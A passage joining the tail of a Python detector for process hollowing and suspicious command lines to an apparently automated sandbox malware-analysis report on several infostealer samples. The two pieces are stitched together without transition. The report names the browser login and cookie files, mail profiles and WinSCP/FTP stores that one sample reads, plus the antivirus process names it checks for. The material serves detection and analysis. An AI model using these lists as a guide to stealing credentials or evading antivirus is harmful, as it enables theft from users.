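    r"Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\notepad.exe notepad.exe C:\Users\user\notes.txt",  # constructed control
]


def analyze(lines):
    """Return hollowing triples (source, target, base) and command-line findings (source, rule, object)."""
    mem = defaultdict(lambda: {"unmapped": set(), "exec_alloc": set(), "written": False})
    findings = []
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        src, kind, rest = m.group("src"), m.group("kind"), m.group("rest")
        if kind in MEM_RE:
            mm = MEM_RE[kind].match(rest)
            if not mm:
                continue
            state = mem[(src, mm.group("target"))]
            if kind == "Section unmapped":
                state["unmapped"].add(mm.group("base"))
            elif kind == "Memory allocated" and "execute" in mm.group("prot"):
                state["exec_alloc"].add(mm.group("base"))
            elif kind == "Memory written":
                state["written"] = True
        elif kind == "Process created":
            image, _, cmdline = rest.partition(" ")
            low = image.lower()
            if low.endswith(".pif") or any(d in low for d in USER_WRITABLE):
                findings.append((src, "suspicious-image-path", image))
            for name, rx in CMD_RULES:
                cm = rx.search(cmdline)
                if cm:
                    findings.append((src, name, cm.group("what")))
    # Hollowing = original section unmapped AND executable memory allocated at the
    # same base in the same foreign process AND something written into that process.
    hollowing = [(src, target, base)
                 for (src, target), st in mem.items() if st["written"]
                 for base in sorted(st["unmapped"] & st["exec_alloc"])]
    return {"hollowing": hollowing, "findings": findings}


if __name__ == "__main__":
    result = analyze(SAMPLE_LINES)
    for src, target, base in result["hollowing"]:
        print(f"hollowing: {src} -> {target} at 0x{base}")
    for src, rule, what in result["findings"]:
        print(f"{rule}: {src} -> {what}")
```

The three command-line rules are intentionally narrow (a literal cmd.exe source for the esentutl copy, an ExclusionPath argument, a task action under a user-writable directory) so that each hit is actionable on its own; on a real endpoint the same logic maps directly onto process-creation telemetry such as Sysmon event ID 1.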
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Code function: 8_1_10028550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,wsprintfW
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EC5ACC GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ECA7C4 GetLocaleInfoA
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EC5BD8 lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ECA810 GetLocaleInfoA
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 27_2_02D75ACC GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 27_2_02D75BD7 lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 27_2_02D7A810 GetLocaleInfoA
                      Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EC920C GetLocalTime,0_2_02EC920C
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_10028550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,wsprintfW,8_1_10028550
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ECB78C GetVersionExA,0_2_02ECB78C
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      Source: Yara match | File source: 9.0.neworigin.exe.840000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000009.00000002.2395131406.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001D.00000002.4593833570.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001D.00000002.4593833570.000000000329C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000002.2459185652.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000000.2187675725.0000000000842000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.2395131406.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000002.2459185652.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.2395131406.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000002.2459185652.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001D.00000002.4593833570.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: neworigin.exe PID: 3796, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: neworigin.exe PID: 2968, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: neworigin.exe PID: 5328, type: MEMORYSTR
                      Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | File opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara match | File source: 9.0.neworigin.exe.840000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000009.00000000.2187675725.0000000000842000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000002.2459185652.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.2395131406.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001D.00000002.4593833570.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
